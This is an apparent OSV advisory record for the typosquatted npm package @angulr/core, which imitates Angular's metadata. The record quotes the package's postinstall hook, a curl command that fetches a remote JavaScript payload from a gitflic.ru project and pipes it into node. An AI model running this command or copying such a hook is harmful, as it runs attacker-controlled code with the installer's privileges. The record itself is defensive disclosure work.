{"id":"MAL-2026-17538","summary":"Malicious code in @angulr/core (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (c24dfd4b0a686b9056ff662e6fee53edfe23c7a94a5edf93fb4cace176216518)\nThe npm package `@angulr/core` masquerades as Angular's `@angular/core` by cloning its package.json metadata (description 'Angular - the core framework', author 'angular', repository angular/angular, ng-update packageGroup) while shipping a hostile `postinstall` script. The postinstall hook runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js |... node`, piping an unpinned, remotely fetched JavaScript payload directly into Node at install time. The destination is a personal `hellscripter` project on gitflic.ru fronted via web.archive.org, unrelated to Angular's publisher. Any developer running `npm install @angulr/core` executes attacker-controlled code with the installer's privileges, with no integrity check and no pinning.\n","modified":"2026-10-05T04:15:04.289023124Z","published":"2026-10-05T03:32:35Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-020995","import_time":"2026-10-05T03:57:37.453925131Z","modified_time":"2026-10-05T03:32:35Z","sha256":"c24dfd4b0a686b9056ff662e6fee53edfe23c7a94a5edf93fb4cace176216518","source":"amazon-inspector","versions":["22.2.1"]}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@angulr/core/v/22.2.1"}],"affected":[{"package":{"name":"@angulr/core","ecosystem":"npm","purl":"pkg:npm/%40angulr/core"},"versions":["22.2.1"],"database_specific":{"cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}],"indicators":{"evidence_files":[{"path":"package.json","sha256":"ea65f62f5d0393f3a5ee06a0a7df4b2863c23d2120b4d558be3887f4faa45235","tlsh":"b7513624e4f48d6323de6294dd2a4943b138495b5c38bd68b3dd009c8f0e61f21beb9a"}],"package_integrity":[{"filename":"core-22.2.1.tgz","hashes":{"sha1":"54e5a243cc5ce28fd8c808f61b68715b3a6d91f8","sha512_sri":"sha512-0IQCPDW2In1OvNnqNheA84rwjNF2IIkn5gxQ7zdcxEx4Wj/kWzsDKakbTw/31YEoO6QlM8oMzTdwlpP7i9qWbA=="}}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@angulr/core/MAL-2026-17538.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}